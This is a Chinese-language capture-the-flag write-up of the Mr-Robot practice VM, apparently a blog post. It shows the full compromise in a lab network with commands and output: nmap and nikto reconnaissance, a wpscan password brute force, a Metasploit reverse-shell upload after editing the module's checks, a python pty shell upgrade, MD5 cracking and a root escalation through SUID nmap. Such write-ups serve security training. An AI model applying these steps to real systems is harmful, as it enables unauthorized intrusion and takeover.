• [Write-up]Mr-Robot


    关于

    1. 下载地址
    2. 目标:找到3个Key
    3. 哔哩哔哩视频

    信息收集

    1. 用的是Host-only,所以网卡是vmnet1,IP一直是192.168.7.1/24
    2. nmap -T4 192.168.7.1/24 -A
    kali-team@LTS:~$ nmap -T4 192.168.7.1/24 -A
    
    Nmap scan report for 192.168.7.129
    Host is up (0.00075s latency).
    Not shown: 997 filtered ports
    PORT    STATE  SERVICE  VERSION
    22/tcp  closed ssh
    80/tcp  open   http     Apache httpd
    |_http-server-header: Apache
    |_http-title: Site doesn't have a title (text/html).
    443/tcp open   ssl/http Apache httpd
    |_http-server-header: Apache
    |_http-title: Site doesn't have a title (text/html).
    | ssl-cert: Subject: commonName=www.example.com
    | Not valid before: 2015-09-16T10:45:03
    |_Not valid after:  2025-09-13T10:45:03
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 256 IP addresses (2 hosts up) scanned in 47.44 seconds
    
    kali-team@LTS:~$ curl http://192.168.7.129/robots.txt
    User-agent: *
    fsocity.dic
    key-1-of-3.txt
    
    1. 发现第一个Key【073403c8a58a1f80d943455fb30724b9】,外加一个字典,下载字典到本地。
    2. 字典很大,可能有重复的,先优化一下。sort fsocity.dic | uniq > list.dic
    3. nikto -h http://192.168.7.129
    kali-team@LTS:~/桌面$ nikto -h http://192.168.7.129
    - Nikto v2.1.5
    ---------------------------------------------------------------------------
    + Target IP:          192.168.7.129
    + Target Hostname:    192.168.7.129
    + Target Port:        80
    + Start Time:         2018-06-19 20:37:10 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache
    + IP address found in the 'x-mod-pagespeed' header. The IP is "1.9.32.3".
    + Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
    + Uncommon header 'x-mod-pagespeed' found, with contents: 1.9.32.3-4523
    + Retrieved x-powered-by header: PHP/5.5.29
    + Uncommon header 'x-pingback' found, with contents: http://192.168.7.129/xmlrpc.php
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad 
    + "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
    + OSVDB-3092: /admin/: This might be interesting...
    + Uncommon header 'tcn' found, with contents: choice
    + OSVDB-3092: /readme: This might be interesting...
    + Uncommon header 'link' found, with contents: <http://192.168.7.129/?p=23>; rel=shortlink
    + OSVDB-3092: /license.txt: License file found may identify site software.
    + /admin/index.html: Admin login page/section found.
    + Cookie wordpress_test_cookie created without the httponly flag
    + /wp-login/: Admin login page/section found.
    + /wordpress/: A Wordpress installation was found.
    + 6544 items checked: 0 error(s) and 16 item(s) reported on remote host
    + End Time:           2018-06-19 20:39:38 (GMT8) (148 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    1. 通过nikto简单扫描或者用dirsearch扫一下目录
    kali-team@LTS:~/桌面$ dirsearch -u http://192.168.7.129 -e * |grep 200
    [20:42:35] 301 -  235B  - /admin  ->  http://192.168.7.129/admin/
    [20:42:36] 200 -    1KB - /admin/
    [20:42:36] 200 -    1KB - /admin/?/login
    [20:42:38] 200 -    1KB - /admin/index
    [20:42:38] 200 -    1KB - /admin/index.html
    [20:42:41] 301 -    0B  - /admin_area/index.php  ->  http://192.168.7.129/admin_area/
    [20:43:15] 200 -    0B  - /favicon.ico
    [20:43:23] 200 -    1KB - /index.html
    [20:43:25] 200 -  504KB - /intro
    [20:43:28] 200 -  309B  - /license.txt
    [20:43:50] 200 -   64B  - /readme
    [20:43:50] 200 -   64B  - /readme.html
    [20:43:51] 200 -   41B  - /robots.txt
    [20:43:56] 200 -    0B  - /sitemap
    [20:43:56] 200 -    0B  - /sitemap.xml
    [20:43:56] 200 -    0B  - /sitemap.xml.gz
    [20:44:12] 200 -    0B  - /wp-content/
    [20:44:12] 200 -    0B  - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
    [20:44:12] 200 -    3KB - /wp-login
    [20:44:12] 200 -    3KB - /wp-login.php
    [20:44:12] 200 -    3KB - /wp-login/
    
    1. 明显是一个WordPress,但是没有看到有用户发文章。打开登录页面枚举用户名,百度Mr.Robot发现黑客军团的主角叫Elliot,现在他提示密码错误了,说明用户名是对的。然后用刚刚发现的字典爆破。
    2. wpscan -u http://192.168.7.129 --username Elliot --wordlist list.dic
    [+] Enumerating plugins from passive detection ...
    [+] No plugins found passively
    [+] Starting the password brute forcer
      [+] [SUCCESS] Login : Elliot Password : ER28-0652                                                                                                                                                         
    
      Brute Forcing 'Elliot' Time: 00:01:21 <=============================================================                                                                > (5637 / 11452) 49.22%  ETA: 00:01:24
      +----+--------+------+-----------+
      | ID | Login  | Name | Password  |
      +----+--------+------+-----------+
      |    | Elliot |      | ER28-0652 |
      +----+--------+------+-----------+
    
    [+] Finished: Tue Jun 19 21:22:23 2018
    [+] Elapsed time: 00:01:22
    [+] Requests made: 5703
    [+] Memory used: 32.516 MB
    

    GetShell

    1. 第一种就是以前的登录改主题404模板
    2. 第二种要用到Metasploit,看自己喜欢。一个大坑!
    msf > use exploit/unix/webapp/wp_admin_shell_upload 
    msf exploit(unix/webapp/wp_admin_shell_upload) > show options 
    Module options (exploit/unix/webapp/wp_admin_shell_upload):
    
       Name          Current Setting  Required  Description
       ----          ---------------  --------  -----------
       PASSWORD      ER28-0652        yes       The WordPress password to authenticate with
       PAYLOAD_NAME  Kali-Team        yes       Fix By Kali-Team payload_name to update with
       PLUGIN_NAME   WordPress        yes       Fix By Kali-Team plugin_name to update with
       Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOST         192.168.7.129    yes       The target address
       RPORT         80               yes       The target port (TCP)
       SSL           false            no        Negotiate SSL/TLS for outgoing connections
       TARGETURI     /                yes       The base path to the wordpress application
       USERNAME      Elliot           yes       The WordPress username to authenticate with
       VHOST                          no        HTTP server virtual host
    
    
    Payload options (php/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.7.1      yes       The listen address (an interface may be specified)
       LPORT  7788             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   WordPress
    
    msf exploit(unix/webapp/wp_admin_shell_upload) > set password ER28-0652
    password => ER28-0652
    msf exploit(unix/webapp/wp_admin_shell_upload) > set username Elliot
    username => Elliot
    msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.7.129
    rhost => 192.168.7.129
    
    msf exploit(unix/webapp/wp_admin_shell_upload) > run 
    
    [*] Started reverse TCP handler on 192.168.7.1:4444 
    [-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
    [*] Exploit completed, but no session was created.
    
    1. 报错了,Google修复,可以上传,但是反弹不会来插件的路径。

      /opt/metasploit-framework/embedded/framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb

      用#注释掉下面两行

      fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?

      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

    2. 再重新载入模块

    msf exploit(unix/webapp/wp_admin_shell_upload) > reload
    [*] Reloading module...
    msf exploit(unix/webapp/wp_admin_shell_upload) > run 
    
    [*] Started reverse TCP handler on 192.168.7.1:7788 
    [*] Authenticating with WordPress using Elliot:ER28-0652...
    [+] Authenticated with WordPress
    [*] Preparing payload...
    [*] Uploading payload...
    [*] Executing the payload at /wp-content/plugins/WordPress/Kali-Team.php...
    [*] Sending stage (37775 bytes) to 192.168.7.129
    [*] Meterpreter session 5 opened (192.168.7.1:7788 -> 192.168.7.129:36273) at 2018-06-19 23:13:10 +0800
    ls
    [!] This exploit may require manual cleanup of 'Kali-Team.php' on the target
    [!] This exploit may require manual cleanup of 'WordPress.php' on the target
    [!] This exploit may require manual cleanup of '../WordPress' on the target
    

    提权

    1. 在robot用户的目录下找到了第二个Key,但是没权限查看。
    meterpreter > ls
    Listing: /home/robot
    ====================
    
    Mode              Size  Type  Last modified              Name
    ----              ----  ----  -------------              ----
    100400/r--------  33    fil   2015-11-13 15:28:21 +0800  key-2-of-3.txt
    100644/rw-r--r--  39    fil   2015-11-13 15:28:21 +0800  password.raw-md5
    
    meterpreter > cat password.raw-md5
    robot:c3fcd3d76192e4007dfb496cca67e13b
    
    1. 把MD5破解出来,应该就是robot的密码了。
    2. 但是su在反弹回来的shell中执行不了。su: must be run from a terminal
    3. 转py可以进入交互模式python -c 'import pty;pty.spawn("/bin/bash")'
    python -c 'import pty;pty.spawn("/bin/bash")'
    daemon@linux:/home/robot$ su robot
    su robot
    Password: abcdefghijklmnopqrstuvwxyz
    
    robot@linux:~$ id
    id
    uid=1002(robot) gid=1002(robot) groups=1002(robot)
    robot@linux:~$ cat key-2-of-3.txt
    cat key-2-of-3.txt
    822c73956184f694993bede3eb39f959
    
    1. 第二个Key找到了!
    2. 最后提升到root权限,找开启了SUID权限的应用
    robot@linux:/$ cd /root
    cd /root
    bash: cd: /root: Permission denied
    robot@linux:/$ find / -perm -4000 -type f 2>/dev/null
    find / -perm -4000 -type f 2>/dev/null
    /bin/ping
    /bin/umount
    /bin/mount
    /bin/ping6
    /bin/su
    /usr/bin/passwd
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/bin/chfn
    /usr/bin/gpasswd
    /usr/bin/sudo
    /usr/local/bin/nmap
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
    /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
    /usr/lib/pt_chown
    robot@linux:/$ 
    
    1. 低版本的nmap可以用交互模式,而且上面说的是root权限。!后面接着命令就可以了。
    robot@linux:/$ nmap --help
    nmap --help
    Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>
    Some Common Scan Types ('*' options require root privileges)
    * -sS TCP SYN stealth port scan (default if privileged (root))
      -sT TCP connect() port scan (default for unprivileged users)
    * -sU UDP port scan
      -sP ping scan (Find any reachable machines)
    * -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
      -sV Version scan probes open ports determining service & app names/versions
      -sR RPC scan (use with other scan types)
    Some Common Options (none are required, most can be combined):
    * -O Use TCP/IP fingerprinting to guess remote operating system
      -p <range> ports to scan.  Example range: 1-1024,1080,6666,31337
      -F Only scans ports listed in nmap-services
      -v Verbose. Its use is recommended.  Use twice for greater effect.
      -P0 Don't ping hosts (needed to scan www.microsoft.com and others)
    * -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
      -6 scans via IPv6 rather than IPv4
      -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
      -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
      -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
      -iL <inputfile> Get targets from file; Use '-' for stdin
    * -S <your_IP>/-e <devicename> Specify source address or network interface
      --interactive Go into interactive mode (then press h for help)
    Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
    SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES 
    robot@linux:/$ 
    robot@linux:/$ nmap --interactive
    nmap --interactive
    Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
    Welcome to Interactive Mode -- press h <enter> for help
    

    nmap> !id
    !id
    uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
    waiting to reap child : No child processes
    nmap> 
    Unknown command (ls) -- press h <enter> for help
    nmap/> !ls
    !ls
    bin   dev  home        lib    lost+found  mnt  proc  run   srv	tmp  var
    boot  etc  initrd.img  lib64  media	  opt  root  sbin  sys	usr  vmlinuz
    waiting to reap child : No child processes
    nmap> !ls /root  
    !ls /root
    firstboot_done	key-3-of-3.txt
    waiting to reap child : No child processes
    nmap> cat /root/key-3-of-3.txt
    cat /root/key-3-of-3.txt
    Unknown command (cat) -- press h <enter> for help
    nmap> !cat /root/key-3-of-3.txt
    !cat /root/key-3-of-3.txt
    04787ddef27c3dee1ee161b21670b4e4
    waiting to reap child : No child processes
    nmap> 
    

    彩蛋

    1. 其实账号密码别人已经给你了http://192.168.7.129/license.txt
    2. 拿到ZWxsaW90OkVSMjgtMDY1Mgo=
    3. base64解一下echo ZWxsaW90OkVSMjgtMDY1Mgo= |base64 --decode
    4. elliot:ER28-0652
  • 相关阅读:
    短信
    solr测试用的配置
    中文词启动
    配置域
    applicationContext-redis.xml
    Redis端口配置
    springDataRedis 依赖
    FastDFSClient上传图片工具类
    security 页面测试
    PHP图片压缩功能(按比例图片缩放)(转载)
  • 原文地址:https://www.cnblogs.com/Kali-Team/p/12210997.html
Copyright © 2020-2023  润新知